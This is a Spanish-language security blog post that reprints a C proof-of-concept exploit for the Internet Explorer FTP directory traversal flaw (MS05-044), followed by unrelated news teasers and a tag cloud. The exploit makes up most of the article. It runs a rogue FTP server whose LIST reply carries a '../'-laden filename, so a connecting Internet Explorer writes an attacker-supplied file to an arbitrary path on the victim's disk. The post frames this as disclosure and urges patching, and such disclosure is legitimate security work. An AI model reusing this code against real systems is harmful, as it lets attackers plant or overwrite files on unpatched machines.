Exploit Ms-Windows (Boletin MS05-044) Manipulación de transferencias en FTP


frsirt.com ha publicado el exploit (como prueba de concepto) del exploit que permite Manipulación de transferencias en FTP, por ello se deben actualizar los sistemas Windows a la brevedad.





/*
* Microsoft Internet Explorer FTP Download Directory Traversal PoC Exploit
*
* by Albert Puigsech Galicia (ripe / 7a69)
*
*/

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>

#define MAX_BUF 1024
#define FTP_PORT 21

int main(int argc, char **argv) {
char ch;
char buffer[MAX_BUF + 1];
char ipbuf[MAX_BUF + 1];
char *local_file, *remote_file;
int sfdmain, sfdses, sfddata;
int readed;
int ip1,ip2,ip3,ip4,port1,port2;
int fd;
struct stat st;
struct sockaddr_in ftpmain = { AF_INET, htons(FTP_PORT), INADDR_ANY };
struct sockaddr_in ftpdata;

if (argc < 3) {
printf("\t7a69Adv#17 - Internet Explorer FTP Download Directory Traversal PoC Exploit\n");
printf("Use:\n");
printf("\t%s <local_file> <remote_file>\n", argv[0]);
exit(0);
}

local_file = argv[1];
remote_file = argv[2];

if ((fd = open(local_file, O_RDONLY)) == -1) {
perror("open()");
exit(-1);
}

if ((sfdmain = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}

if (bind(sfdmain, (struct sockaddr *)&ftpmain, sizeof(struct sockaddr)) == -1) {
perror("bind()");
exit(-1);
}

if (listen(sfdmain, 1) == -1) {
perror("listen()");
exit(-1);
}

if ((sfdses = accept(sfdmain, NULL, NULL)) == -1) {
perror("accept()");
exit(-1);
}

write(sfdses, "200 OK\r\n", 8);

while ((readed = read(sfdses, buffer, MAX_BUF)) > 0) {
buffer[readed] = 0;
printf(">> %s", buffer);
if (!strncmp(buffer, "noop", 4)) write(sfdses, "200 OK\r\n", 8);
else if (!strncmp(buffer, "USER ", 5)) write(sfdses, "331 OK\r\n", 8);
else if (!strncmp(buffer, "PASS ", 5)) write(sfdses, "230 OK\r\n", 8);
else if (!strncmp(buffer, "CWD ", 4)) write(sfdses, "250 OK\r\n", 8);
else if (!strncmp(buffer, "PWD", 3)) write(sfdses, "257 \"/\"\r\n", 9);
else if (!strncmp(buffer, "TYPE ", 5)) write(sfdses, "200 OK\r\n", 8);
else if (!strncmp(buffer, "PORT ", 5)) {
sscanf(&buffer[5], "%i,%i,%i,%i,%i,%i", &ip1, &ip2, &ip3, &ip4, &port1, &port2);
snprintf(ipbuf, MAX_BUF, "%i.%i.%i.%i", ip1, ip2, ip3, ip4);
ftpdata.sin_family = AF_INET;
ftpdata.sin_addr.s_addr = inet_addr(ipbuf);
ftpdata.sin_port = htons(port1*256+port2);
if ((sfddata = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
if (connect(sfddata, (struct sockaddr *)&ftpdata, sizeof(struct sockaddr)) == -1) {
write(sfdses, "421 OK\r\n", 8);
} else {
write(sfdses, "220 OK\r\n", 8);
}
}
else if (!strncmp(buffer, "LIST", 4)) {
write(sfdses, "150 OK\r\n", 8);
snprintf(buffer, MAX_BUF, "-rwxrwxrwx 1 0 0 1 Dec 08 07:36
/../../../../../../../../../../..%s\r\n", remote_file);
write(sfddata, buffer, strlen(buffer));
close(sfddata);
write(sfdses, "226 OK\r\n", 8);

}
else if(!strncmp(buffer, "RETR ", 5)) {
write(sfdses, "150 OK\r\n", 8);
fstat(fd, &st);
while(st.st_size-- > 0) {
read(fd, &ch, 1);
write(sfddata, &ch, 1);
}
close(sfddata);
write(sfdses, "226 OK\r\n", 8);
}
else if (!strncmp(buffer, "QUIT", 4)) {
write(sfdses, "221 OK\r\n", 8);
close(sfdses); close(sfdmain); close(sfddata);
}
else
write(sfdses, "500 WTF\r\n", 9);


}
}

 

 

Fuente:
frsirt.com



Otras noticias de interés:

Firefox 2.0.0.13 ya está disponible
Una de las últimas actualizaciones de la versión 2 del navegador mejora una serie de problemas de seguridad y mejora la estabilidad de los Javascript. En junio saldrá la versión 3 del browser del afundación Mozilla....
El virus de Bin Laden
Hoy tras conmemorarse el primer aniversario del ataque terrorista a EE.UU. por parte de la red AlQaeda, liderada por Osama Bin Laden, ha salido a la luz un virus muy peligroso debido al ingenio de sus creadores....
El troyano SpyEye se sigue propagando
El troyano bancario SpyEye sigue propagandose entre computadoras de todo el mundo y empieza a ser un reto para su detección y eliminación, según dos investigadores de seguridad de RSA....
Cerrado MegaUpload
David Gómez, en emslinux.com publicó un articulo bastante bueno donde hacen referencia al cierre del sitio MegaUpload. A continuación el texto....
Falla en Outlook Express al verificar firma digital
Un nuevo parche liberado por Microsoft, soluciona otra falla importante en la seguridad de Outlook Express. El error, afecta al popular cliente de correo electrónico proporcionado gratuitamente con todas las versiones actuales de Inte...
Manzanas y gusanos
Se habla en los medios de un par de virus (o troyanos o gusanos) que han sido detectados replicándose a sí mismos. Esto no sería en absoluto novedad, sino fuera porque el código infecta a los MAC OS X de Apple....
A pesar del Cloud Computing, es necesario instalar Software antimalware
David Perry, con una dilatada experiencia de más de 25 años, está considerado uno de los mejores expertos mundiales en el campo del hacking, virus, malware y cibercrimen. Además, ha sido asesor de la Casa Blanca y es autor y conferenciante muy po...
Microsoft publicará 17 parches para 64 vulnerabilidades
La actualización de seguridad del próximo martes 12 de abril 2011, es la mayor realizada por Microsoft. Cumpliendo con su programa de actualizaciones los segundos martes de mes, Microsoft lanzará 17 boletines de seguridad que solucionarán un 64 v...
Sentencia: validez de las licencias copyleft
Quizás el caso les suene porque tiene ya algunos meses y se comentó en algunos medios (aunque es ahora cuando he conseguido acceder a la sentencia de primera instancia): un autor que usa una licencia libre para algunas de las obras que publica en I...
Vulnerabilidad de denegación de servicio en AIX 4.3.3 y 5.1.0
Existe una vulnerabilidad de denegación de servicio en el sistema operativo AIX de IBM. Un atacante puede provocar, en determinadas configuraciones, la detención inesperada del sistema. En los sistemas AIX 4.3.3 y 5.1.0 con la opción sack (Selec...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • boletin
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploit
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • ftp
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • manipulacion
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • transferencias
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra